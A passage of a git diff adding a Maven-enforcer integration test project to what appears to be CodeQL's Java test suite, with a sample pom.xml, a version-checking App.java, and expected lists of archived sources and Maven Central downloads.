https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-plexus/1.4.2/sisu-inject-plexus-1.4.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-plexus/1.4.2/sisu-inject-plexus-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject/1.4.2/sisu-inject-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-parent/1.4.2/sisu-parent-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/12/spice-parent-12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/15/spice-parent-15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/17/spice-parent-17.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/tukaani/xz/1.5/xz-1.5.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/tukaani/xz/1.5/xz-1.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/tukaani/xz/1.9/xz-1.9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/tukaani/xz/1.9/xz-1.9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/oro/oro/2.0.8/oro-2.0.8.jar +Downloaded from central: https://repo.maven.apache.org/maven2/oro/oro/2.0.8/oro-2.0.8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/xml-apis/xml-apis/1.0.b2/xml-apis-1.0.b2.pom diff --git a/java/ql/integration-tests/java/maven-enforcer-single-version/pom.xml b/java/ql/integration-tests/java/maven-enforcer-single-version/pom.xml new file mode 100644 index 000000000000..c13e7b6a0f32 --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-single-version/pom.xml @@ -0,0 +1,133 @@ + + + + 4.0.0 + + com.example + maven-sample + 1.0-SNAPSHOT + + maven-sample + + http://www.example.com + + + UTF-8 + 1.7 + 1.7 + + + + + junit + junit + 4.11 + test + + + + + + + exec-maven-plugin + org.codehaus.mojo + 1.1.1 + + + check-maven-version + package + + java + + + + + com.example.App + + + + com.diffplug.spotless + spotless-maven-plugin + 2.19.1 + + + + check + + compile + + + + + + /* FAIL ME */ + + + + + + org.apache.maven.plugins + maven-enforcer-plugin + + + enforce-maven + + enforce + + + + + 3.9.1 + + + + + + + + + + + + + maven-clean-plugin + 3.1.0 + + + + maven-resources-plugin + 3.0.2 + + + maven-compiler-plugin + 3.8.0 + + + maven-surefire-plugin + 2.22.1 + + + maven-jar-plugin + 3.0.2 + + + maven-install-plugin + 2.5.2 + + + maven-deploy-plugin + 2.8.2 + + + + maven-site-plugin + 3.7.1 + + + maven-project-info-reports-plugin + 3.0.0 + + + + + diff --git a/java/ql/integration-tests/java/maven-enforcer-single-version/source_archive.expected b/java/ql/integration-tests/java/maven-enforcer-single-version/source_archive.expected new file mode 100644 index 000000000000..59a81a01481c --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-single-version/source_archive.expected @@ -0,0 +1,10 @@ +pom.xml +src/main/java/com/example/App.java +src/main/resources/my-app.properties +src/main/resources/page.xml +src/main/resources/struts.xml +src/test/java/com/example/AppTest.java +target/classes/my-app.properties +target/classes/page.xml +target/classes/struts.xml +target/maven-archiver/pom.properties diff --git a/java/ql/integration-tests/java/maven-enforcer-single-version/src/main/java/com/example/App.java b/java/ql/integration-tests/java/maven-enforcer-single-version/src/main/java/com/example/App.java new file mode 100644 index 000000000000..c9eec918587c --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-single-version/src/main/java/com/example/App.java @@ -0,0 +1,30 @@ +package com.example; + +import java.util.regex.Pattern; +import java.nio.file.Path; +import java.nio.file.Paths; + +/** + * Hello world! + * + */ +public class App +{ + public static void main( String[] args ) + { + System.out.println( "Hello World!" ); + String expectedVersion = System.getenv("EXPECT_MAVEN"); + Path mavenHome = Paths.get(System.getProperty("maven.home")).normalize(); + String observedVersion = mavenHome.getFileName().toString(); + if (expectedVersion != null && !expectedVersion.equals(observedVersion)) { + System.err.println("Wrong maven version, expected '" + expectedVersion + "' but got '" + observedVersion + "'" + mavenHome); + System.exit(1); + } + String commandMatcher = System.getenv("EXPECT_COMMAND_REGEX"); + String command = System.getProperty("sun.java.command"); + if (commandMatcher != null && !Pattern.matches(commandMatcher, command)) { + System.err.println("Wrong command line, '" + command + "' does not match '" + commandMatcher + "'"); + System.exit(1); + } + } +} diff --git a/java/ql/integration-tests/java/maven-enforcer-single-version/src/main/resources/my-app.properties b/java/ql/integration-tests/java/maven-enforcer-single-version/src/main/resources/my-app.properties new file mode 100644 index 000000000000..e566b49a29a8 --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-single-version/src/main/resources/my-app.properties @@ -0,0 +1 @@ +version=1.0 diff --git a/java/ql/integration-tests/java/maven-enforcer-single-version/src/main/resources/page.xml b/java/ql/integration-tests/java/maven-enforcer-single-version/src/main/resources/page.xml new file mode 100644 index 000000000000..2bab459cb031 --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-single-version/src/main/resources/page.xml @@ -0,0 +1,8 @@ + + +A sample + + +

    Hello world!

    + + diff --git a/java/ql/integration-tests/java/maven-enforcer-single-version/src/main/resources/struts.xml b/java/ql/integration-tests/java/maven-enforcer-single-version/src/main/resources/struts.xml new file mode 100644 index 000000000000..73fc0c6b9cb6 --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-single-version/src/main/resources/struts.xml @@ -0,0 +1,4 @@ + + +This is a sample file + diff --git a/java/ql/integration-tests/java/maven-enforcer-single-version/src/test/java/com/example/AppTest.java b/java/ql/integration-tests/java/maven-enforcer-single-version/src/test/java/com/example/AppTest.java new file mode 100644 index 000000000000..22a94ca6f01c --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-single-version/src/test/java/com/example/AppTest.java @@ -0,0 +1,20 @@ +package com.example; + +import static org.junit.Assert.assertTrue; + +import org.junit.Test; + +/** + * Unit test for simple App. + */ +public class AppTest +{ + /** + * Rigorous Test :-) + */ + @Test + public void shouldAnswerWithTrue() + { + assertTrue( true ); + } +} diff --git a/java/ql/integration-tests/java/maven-enforcer-single-version/test.py b/java/ql/integration-tests/java/maven-enforcer-single-version/test.py new file mode 100644 index 000000000000..eb49efe6a2a3 --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-single-version/test.py @@ -0,0 +1,2 @@ +def test(codeql, java): + codeql.database.create() diff --git a/java/ql/integration-tests/java/maven-enforcer/maven-fetches.expected b/java/ql/integration-tests/java/maven-enforcer/maven-fetches.expected new file mode 100644 index 000000000000..dab45b38bf7e --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer/maven-fetches.expected @@ -0,0 +1,541 @@ +Downloaded from central: https://repo.maven.apache.org/maven2/avalon-framework/avalon-framework/4.1.3/avalon-framework-4.1.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/backport-util-concurrent/backport-util-concurrent/3.1/backport-util-concurrent-3.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/backport-util-concurrent/backport-util-concurrent/3.1/backport-util-concurrent-3.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1-alpha-2/classworlds-1.1-alpha-2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1/classworlds-1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1/classworlds-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/durian/durian-collect/1.2.0/durian-collect-1.2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/durian/durian-collect/1.2.0/durian-collect-1.2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/durian/durian-core/1.2.0/durian-core-1.2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/durian/durian-core/1.2.0/durian-core-1.2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-lib-extra/2.21.2/spotless-lib-extra-2.21.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-lib-extra/2.21.2/spotless-lib-extra-2.21.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-lib/2.21.2/spotless-lib-2.21.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-lib/2.21.2/spotless-lib-2.21.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-maven-plugin/2.19.1/spotless-maven-plugin-2.19.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-maven-plugin/2.19.1/spotless-maven-plugin-2.19.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/github/luben/zstd-jni/1.5.5-11/zstd-jni-1.5.5-11.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/github/luben/zstd-jni/1.5.5-11/zstd-jni-1.5.5-11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/2.0.1/jsr305-2.0.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/2.0.1/jsr305-2.0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/googlecode/concurrent-trees/concurrent-trees/2.6.1/concurrent-trees-2.6.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/googlecode/concurrent-trees/concurrent-trees/2.6.1/concurrent-trees-2.6.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/googlecode/javaewah/JavaEWAH/1.1.12/JavaEWAH-1.1.12.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/googlecode/javaewah/JavaEWAH/1.1.12/JavaEWAH-1.1.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M8/qdox-2.0-M8.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M8/qdox-2.0-M8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M9/qdox-2.0-M9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M9/qdox-2.0-M9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-beanutils/commons-beanutils/1.6/commons-beanutils-1.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-beanutils/commons-beanutils/1.7.0/commons-beanutils-1.7.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-beanutils/commons-beanutils/1.7.0/commons-beanutils-1.7.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-chain/commons-chain/1.1/commons-chain-1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-chain/commons-chain/1.1/commons-chain-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-cli/commons-cli/1.0/commons-cli-1.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-cli/commons-cli/1.0/commons-cli-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.11/commons-codec-1.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.16.1/commons-codec-1.16.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.16.1/commons-codec-1.16.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.17.0/commons-codec-1.17.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.17.0/commons-codec-1.17.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/2.0/commons-collections-2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/2.1/commons-collections-2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.2.2/commons-collections-3.2.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.2.2/commons-collections-3.2.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.2/commons-collections-3.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-digester/commons-digester/1.6/commons-digester-1.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-digester/commons-digester/1.8/commons-digester-1.8.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-digester/commons-digester/1.8/commons-digester-1.8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.11.0/commons-io-2.11.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.15.1/commons-io-2.15.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.15.1/commons-io-2.15.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.16.1/commons-io-2.16.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.16.1/commons-io-2.16.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.2/commons-io-2.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.4/commons-io-2.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.5/commons-io-2.5.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.5/commons-io-2.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.6/commons-io-2.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-lang/commons-lang/2.4/commons-lang-2.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-lang/commons-lang/2.4/commons-lang-2.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.0.3/commons-logging-1.0.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.0/commons-logging-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.1/commons-logging-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/dom4j/dom4j/1.1/dom4j-1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/dom4j/dom4j/1.1/dom4j-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/3.8.2/junit-3.8.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/4.11/junit-4.11.jar +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/4.11/junit-4.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/4.12/junit-4.12.jar +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/4.12/junit-4.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/log4j/log4j/1.2.12/log4j-1.2.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/logkit/logkit/1.0.1/logkit-1.0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache-extras/beanshell/bsh/2.0b6/bsh-2.0b6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache-extras/beanshell/bsh/2.0b6/bsh-2.0b6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/11/apache-11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/13/apache-13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/15/apache-15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/16/apache-16.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/18/apache-18.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/19/apache-19.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/20/apache-20.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/21/apache-21.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/23/apache-23.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/25/apache-25.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/27/apache-27.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/29/apache-29.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/3/apache-3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/30/apache-30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/31/apache-31.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/32/apache-32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/4/apache-4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/5/apache-5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/6/apache-6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/7/apache-7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/9/apache-9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.11/commons-compress-1.11.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.11/commons-compress-1.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.26.1/commons-compress-1.26.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.26.1/commons-compress-1.26.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.14.0/commons-lang3-3.14.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.14.0/commons-lang3-3.14.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.8.1/commons-lang3-3.8.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.8.1/commons-lang3-3.8.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/24/commons-parent-24.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/25/commons-parent-25.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/34/commons-parent-34.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/39/commons-parent-39.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/42/commons-parent-42.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/47/commons-parent-47.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/52/commons-parent-52.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/64/commons-parent-64.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/65/commons-parent-65.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/66/commons-parent-66.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/69/commons-parent-69.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/9/commons-parent-9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-text/1.12.0/commons-text-1.12.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-text/1.12.0/commons-text-1.12.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpclient/4.5.13/httpclient-4.5.13.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpclient/4.5.13/httpclient-4.5.13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-client/4.5.13/httpcomponents-client-4.5.13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-core/4.4.13/httpcomponents-core-4.4.13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-core/4.4.14/httpcomponents-core-4.4.14.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-parent/11/httpcomponents-parent-11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.13/httpcore-4.4.13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.14/httpcore-4.4.14.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.14/httpcore-4.4.14.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.8.8/apache-maven-3.8.8-bin.zip +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.8.8/apache-maven-3.8.8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-core/1.11.1/doxia-core-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-core/1.11.1/doxia-core-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-decoration-model/1.11.1/doxia-decoration-model-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-decoration-model/1.11.1/doxia-decoration-model-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-integration-tools/1.11.1/doxia-integration-tools-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-integration-tools/1.11.1/doxia-integration-tools-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-logging-api/1.11.1/doxia-logging-api-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-logging-api/1.12.0/doxia-logging-api-1.12.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-logging-api/1.12.0/doxia-logging-api-1.12.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-module-xhtml/1.11.1/doxia-module-xhtml-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-module-xhtml/1.11.1/doxia-module-xhtml-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-module-xhtml5/1.11.1/doxia-module-xhtml5-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-module-xhtml5/1.11.1/doxia-module-xhtml5-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-modules/1.11.1/doxia-modules-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.0-alpha-7/doxia-sink-api-1.0-alpha-7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.0-alpha-7/doxia-sink-api-1.0-alpha-7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.0/doxia-sink-api-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.11.1/doxia-sink-api-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.12.0/doxia-sink-api-1.12.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.12.0/doxia-sink-api-1.12.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-site-renderer/1.11.1/doxia-site-renderer-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-site-renderer/1.11.1/doxia-site-renderer-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sitetools/1.11.1/doxia-sitetools-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-skin-model/1.11.1/doxia-skin-model-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-skin-model/1.11.1/doxia-skin-model-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia/1.0-alpha-7/doxia-1.0-alpha-7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia/1.0/doxia-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia/1.11.1/doxia-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia/1.12.0/doxia-1.12.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer-api/3.5.0/enforcer-api-3.5.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer-api/3.5.0/enforcer-api-3.5.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer-rules/3.5.0/enforcer-rules-3.5.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer-rules/3.5.0/enforcer-rules-3.5.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer/3.5.0/enforcer-3.5.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.0/maven-aether-provider-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.0/maven-aether-provider-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-archiver/3.1.1/maven-archiver-3.1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-archiver/3.1.1/maven-archiver-3.1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.0.6/maven-artifact-manager-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.0.6/maven-artifact-manager-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.2.1/maven-artifact-manager-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.2.1/maven-artifact-manager-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.0.6/maven-artifact-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.0.6/maven-artifact-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.2.1/maven-artifact-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.2.1/maven-artifact-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.0/maven-artifact-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.0/maven-artifact-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.0.6/maven-core-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.0.6/maven-core-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.2.1/maven-core-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.2.1/maven-core-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.0/maven-core-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.0/maven-core-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.0.6/maven-error-diagnostics-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.0.6/maven-error-diagnostics-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.2.1/maven-error-diagnostics-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.2.1/maven-error-diagnostics-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.0/maven-model-builder-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.0/maven-model-builder-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.0.6/maven-model-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.0.6/maven-model-2.0.6.pom +Downloaded from central: 